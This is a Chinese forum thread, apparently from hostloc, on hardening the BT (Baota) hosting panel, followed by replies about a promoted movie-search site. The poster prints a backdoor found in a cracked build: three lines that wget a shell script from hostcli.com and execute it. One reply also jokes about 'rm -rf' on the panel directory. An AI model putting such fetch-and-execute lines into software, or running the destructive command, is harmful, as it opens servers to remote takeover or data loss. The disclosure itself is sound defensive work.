如何安全的使用宝塔:
先来问一个问题, 为何要使用宝塔: 方便的安装配置环境, 管理站点.
以下建议满足上述基础需求,更高需求满足不了.
1, 免费版: 安装完需要的环境软件, 插件. 然后 ssh 里面 service bt stop, 就会停掉bt进程, 环境不受影响,cron类应该只有一个let证书续费,不会链接bt官网.
2, 收费版: service bt stop后,可能需要定期进后台用到 防护统计,访问统计等插件, 可以在使用时候 service bt start, 访问后台,用完再stop.
bt进程日常就不应该运行.
3,开心版hostcli: 食用方法和上述一致外, 此开心版还加了一个"远程执行后门", 可以手动修改,删除掉代码,也可以使用.
后门文件在
- /www/server/panel/script/check_files.py
删除掉最后三行,这三行是从他服务器上下载一个sh,然后执行这个sh, 目前访问这个地址返回空内容,后门可能随时启用
- checkFile="/www/server/panel/install/check_bt_file.sh"
wget -O ${checkFile} 'https://v7.hostcli.com/tools/check_bt_file.sh'
. ${checkFile}
本人能力有限,开心版只找到这一个后门, 里面还有没有不好说... 删掉这三行,再加上 service bt stop, 应该是安全的.
补充:
根据 https://hostloc.com/forum.php?mod=viewthread&tid=1015859
第三方插件内也可能存在远程执行代码, 原版和开心版都有可能, 可自行下载插件代码分析.
如果有帮助,请点个赞支持一下, 谢谢.
广告一下:
最近打算发布一款影视搜索源码,还在打磨中(主要在建立基础数据库,现有豆瓣电影30多万,豆瓣评分和imdb评分,后期也会开放api)
预览地址 http://175.24.2.129/
后台暂不开放预览,附截图几张
https://tuchuangs.com/imgs/2022/05/12/275b3f9de6499a7c.jpeg
https://tuchuangs.com/imgs/2022/05/12/1826d85756f7f8d5.jpeg
https://tuchuangs.com/imgs/2022/05/12/620ab1f0a886e1ce.jpeg
热议
推荐楼 战斗鸡 昨天17:55
提醒下,hostcli.com 站長是在東南亞做黑產的(之前看到他在某個站長群裏玩“暗雷”),爲人肯定是沒什麽底綫的,最好別用他家的產品。
推荐楼 mgwx 昨天12:42
影视搜索 包含在线观看和下载吗 不包括为啥不用TMDB https://www.themoviedb.org/
推荐楼 louiejordan 昨天12:39
你是有多喜欢汤唯
2楼 挖坑达人 昨天12:24
这影视搜索不错
3楼 laianguo 昨天12:29
影视不错。收费的还是免费的呢?
4楼 bagheera 昨天12:30
影视不错。收费的还是免费的呢?
少量收费吧, 维护数据太耗时了
5楼 gogoo2 昨天12:36
大佬厉害啦,支持一个。。。
6楼 表妹 昨天12:37
你的影视搜索源码有没有后门?会不会连你的服务器?
9楼 魔鬼筋肉人 昨天12:48
谢谢分享
10楼 bagheera 昨天12:48
影视搜索 包含在线观看和下载吗 不包括为啥不用TMDB https://www.themoviedb.org/
是资源的搜索, 不是影片信息,我建设影视基础库,是为了搜索匹配更准确
你可以去搜索一下试试
12楼 hdwan.net 昨天12:49
马克+1
13楼 uov 昨天13:10
我想搞一套 请问有没有群
14楼 xoia 昨天13:13
影视搜索真的不错啊
15楼 dole 昨天13:16
开心版果然有后门
16楼 andox 昨天13:19
影视搜索源码 到时mjj是否有大优惠
17楼 hostloccom 昨天13:25
太牛逼了大佬,这个后台开源吗?这个我根本不知道咋整,太烧脑了
我见过做得更完善的,狐狸的
18楼 Benladen 昨天13:29
影视不错,很邢
19楼 tycu 昨天13:34
用的yu al的开心版,应该没后门吧
20楼 Thintime 昨天13:39
看上大佬的影视搜索了
22楼 疯狂痴呆 昨天13:49
爬的豆瓣吗?
http://175.24.2.129/search.htm?mid=279516&q=%E5%87%BA%E7%A7%9F%E8%BD%A6%E5%8F%B8%E6%9C%BA#
如这个豆瓣几年前就删除了,告知下怎么爬的
23楼 btpanel 昨天13:49
https://hostloc.com/forum.php?mod=viewthread&tid=1015859&extra=page%3D3&mobile=2
24楼 longpo 昨天13:50
ui很好看
25楼 bagheera 昨天17:52
爬的豆瓣吗?
http://175.24.2.129/search.htm?mid=279516&q=%E5%87%BA%E7%A7%9F%E8%BD%A6%E5%8F%B8%E6%9C ...
嗯? 没回复成功吗?
豆瓣和谐的影片, 抓imdb补充的
26楼 战斗鸡 昨天17:55
提醒下,hostcli.com 站長是在東南亞做黑產的(之前看到他在某個站長群裏玩“暗雷”),爲人肯定是沒什麽底綫的,最好別用他家的產品。
27楼 疯狂痴呆 昨天18:06
嗯? 没回复成功吗?
豆瓣和谐的影片, 抓imdb补充的
抓IMDB,然后再手动翻译下片名,其它就不翻了?
28楼 sdqu 昨天18:09
rm -rf /var/www/panel 不是更香么
29楼 bagheera 昨天19:21
抓IMDB,然后再手动翻译下片名,其它就不翻了?
不用翻译,后台匹配资源时候,资源有中文
30楼 maiawpyg 昨天20:39
停止宝塔了 设置的自动更新是不是 失效了
32楼 bagheera 昨天21:01
停止宝塔了 设置的自动更新是不是 失效了
什么自动更新? 宝塔的cron 也是写在系统 crontab 里面的,看一下
33楼 zhongziso 昨天21:01
mark
34楼 wlc1984 昨天21:30
留名,回头慢慢看
35楼 Antony 昨天21:31
这要顶一波,支持一下啊
36楼 btpanel 昨天21:39
用的yu al的开心版,应该没后门吧
参考
https://hostloc.com/thread-1015859-1-2.html
37楼 bagheera 5小时前
参考
https://hostloc.com/thread-1015859-1-2.html
我审计代码只是基于原版和破解版的变动, diff一下, 理论上这样破解版加的私货就可以看出来,官方远程代码执行最为致命,没办法
38楼 btpanel 4小时前
我审计代码只是基于原版和破解版的变动, diff一下, 理论上这样破解版加的私货就可以看出来,官方远程代码 ...
正常 一般都不会去看代码的 而且大多数都不懂代码 就算代码写在那里 你们也不一定知道干啥的
39楼 uov 22分钟前
我想搞一套 请问有没有群
好的 铁子
40楼 醋醋来啦 14分钟前
用的yu al的开心版,应该没后门吧
yual有的,他们把宝塔的api全部替换成自己的域名 yual的api地址了
申明:本文内容由网友收集分享,仅供学习参考使用。如文中内容侵犯到您的利益,请在文章下方留言,本站会第一时间进行处理。